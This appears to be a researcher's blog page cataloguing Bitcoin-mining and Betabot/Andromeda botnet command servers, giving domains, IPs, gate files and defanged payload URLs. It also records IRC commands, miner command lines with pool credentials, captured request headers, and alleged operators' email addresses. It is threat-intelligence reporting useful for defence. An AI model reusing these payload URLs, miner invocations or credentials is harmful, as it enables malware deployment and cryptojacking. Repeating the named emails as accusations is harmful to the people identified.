Tag: Bitcoin Miner Botnet

www.welovegiveaways.net (Andromeda http botnet hosted by enzu.com)

Uncategorized

Resolved www.welovegiveaways.net to 199.229.235.250
Server: www.welovegiveaways.net
Gate file: /justricewithwater/image.php
Plugins:
Rootkit: hxxp://www.welovegiveaways.net/justricewithwater/r.pack
Bitcoin mining info:
Shell.exe -o stratum+tcp://stratum.bitcoin.cz:3333 -u vovler.split1 -p none -t 0 -I 10
macromedia.exe -o stratum+tcp://stratum.bitcoin.cz:3333 -u vovler.split1 -p none -g no
Hosting infos: http://whois.domaintools.com/199.229.235.250

x.e1b2.org (ngrBot irc botnet hosted by namecheap.com)

Uncategorized

Resolved x.e1b2.org to 192.64.114.16, 192.64.114.184
Server: x.e1b2.org
Port: 80
Server password: 666666
Channel: ##Rox-x01##
Topic for ##Rox-x01## is: !m on !s -n !mod usbi on !NAZEL hxxp://www8.0zz0.com/2013/05/25/23/865519528.gif !NAZEL hxxp://www12.0zz0.com/2013/05/24/15/675195622.gif !NAZEL hxxp://www12.0zz0.com/2013/05/21/06/487587018.gif
Topic for ##Rox-x01## set by xXx at Mon May 27 14:47:02 2013
The server requires SSL to connect
Alternate domains: x.e2b3.org x.c1d2.org x.x1ua.org x.x1x2.su

www.vbvx.com (Betabot http botnet hosted by ovh.net)

Uncategorized

Resolved www.vbvx.com to 94.23.56.186
Server: www.vbvx.com
Gate file: /remote/order.php
Bitcoin mining info:
Shell.exe -o http://vbvx.com:8344 -u shubhank008_work -p plawasthi -t 0 -I 10
macromedia.exe -o http://vbvx.com:8344 -u shubhank008_work -p plawasthi -g no -t 2
Looks like he's running a mining proxy on his VPS.
Hosting infos: http://whois.domaintools.com/94.23.56.186
Related md5s (search on malwr.com to download the

privatesmartscreen.nl (Bitcoin Miner hosted in Netherlands Amsterdam Denkers-ict B.v.)

Uncategorized

DNS Queries:
privatesmartscreen.nl DNS_TYPE_A 159.253.0.151
HTTP Conversations:
159.253.0.151:80 – [privatesmartscreen.nl]
Request: GET /Bitcoin/host.txt
149.210.128.55:80 – [149.210.128.55]
Request: GET /bitconi/winlogon32.exe
Request: GET /bitconi/winlogon64.exe
Request: GET /bitconi/usft_ext.dll
Request: GET /bitconi/miner.dll
Request: GET /bitconi/coinutil.dll
Request: GET /ptx.exe
Request: GET /bitconi/btc.exe
Request: GET /bitconi/phatk.exe
Dutch hecker here:
winlogon32.exe -o hxxp://pool.50btc.com:8332/ -u jeroengroenveld@live.nl_Apex -p omega321
Samples:

pool.50btc.com (Bitcoin Miner botnet hosted in Germany Gunzenhausen Magdevelopers)

Uncategorized

Resolved: [pool.50btc.com] To [144.76.52.43]
HTTP Requests: hxxp://pool.50btc.com:8332/
DATA:
POST / HTTP/1.1
Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==
Content-Length: 128
X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchto
User-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3)
Host: pool.50btc.com:8332
Cache-Control: no-cache
{"method": "getblocktemplate", "params": [{"capabilities": ["coinbasetxn", "workid", "coinbase/append", "longpollid"]}], "id":0}
Here the hecker: lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332
Sample: hxxp://158.255.2.104/cucaz.exe
Hosting infos: http://whois.domaintools.com/144.76.52.43

guard4you.info (Betabot http botnet hosted by ecatel.net)

Uncategorized

Resolved guard4you.info to 80.82.66.26
Server: guard4you.info
Gate file: /customer/order.php
Alternate domains: nexusguardian.info vote4us.info meet2n8.info
This is the same idiot as this previous betabot. After three of the free domains he used were suspended due to reports (lol), he decided to try again with paid domains. He's upgraded to four .info domains registered at namecheap, probably all

betabros.in (Several http botnets hosted by hostkey.ru)

Uncategorized

Resolved betabros.in to 146.0.78.4
Server: betabros.in
Gate file: /beta/order.php
The owner should keep a closer eye on the fake forum he set up for cover. 1071 pages of pharmacy spam and counting.
Hosting infos: http://whois.domaintools.com/146.0.78.4
EDIT: Bitcoin and litecoin mining.
macromedia.exe -a scrypt -o http://us.litecoinpool.org:9332 -u marvid.disfig -p x
shell.exe -o stratum+tcp://stratum.btcguild.com:3333 -u vapor_3 -p x

jkdef8.ws (Betabot http botnet hosted by ecatel.net)

Uncategorized

Resolved jkdef8.ws to 94.102.51.117
Server: jkdef8.ws
Gate file: /papka/order.php
Alternate domains (currently unregistered): jkdef6.ws jkdef7.ws jkdef10.ws jkdef11.ws jkdef12.ws jkdef13.ws jkdef14.ws jkdef15.ws jkdef16.ws jkdef17.ws jkdef18.ws jkdef19.ws jkdef20.ws jkdef21.ws jkdef22.ws
Bitcoin mining info: http://pooledbits.com:8337 -u nigfinity.1 -p x
Hosting infos: http://whois.domaintools.com/94.102.51.117

msn.3utilities.com (Betabot http botnet hosted by ecatel.net)

Uncategorized

Resolved msn.3utilities.com to 80.82.66.43
Server: msn.3utilities.com
Port: 81
Gate file: /help/order.php
Alternate domains: videoparadise.biz kittybook.biz msn1981.3utilities.com dates4you.tk
Three out of the five domains are free and easy to get suspended. Pro botherder here.
Bitcoin mining info: stratum+tcp://eu-stratum.btcguild.com:3333 -u m4tr1x_neo -p 123 -t 0 -I -3
Litecoin mining info: -a scrypt -o http://kittybook.no-ip.biz:8332 -u m4tr1x_0

btcguild.com (Bitcoin Miner botnet hosted in United States Dallas Ebl Global Networks Inc.)

Uncategorized

URL: hxxp://btcguild.com:8332/
hxxp://btcguild.com:8332 -u chakan_1 -p 123
hxxp://btcguild.com:8332 -u graskla_1 -p 123
DATA:
POST / HTTP/1.1
Authorization: Basic Y2hha2FuXzE6MTIz
Content-Length: 43
User-Agent: Ufasoft bitcoin-miner/0.20 (Windows NT XP 5.1.2600 Service Pack 3)
Host: btcguild.com:8332
Cache-Control: no-cache
{"method": "getwork", "params": [], "id":0}
Actions Detected:
Creates autorun records
Injects code into other processes
Patches system files
Samples: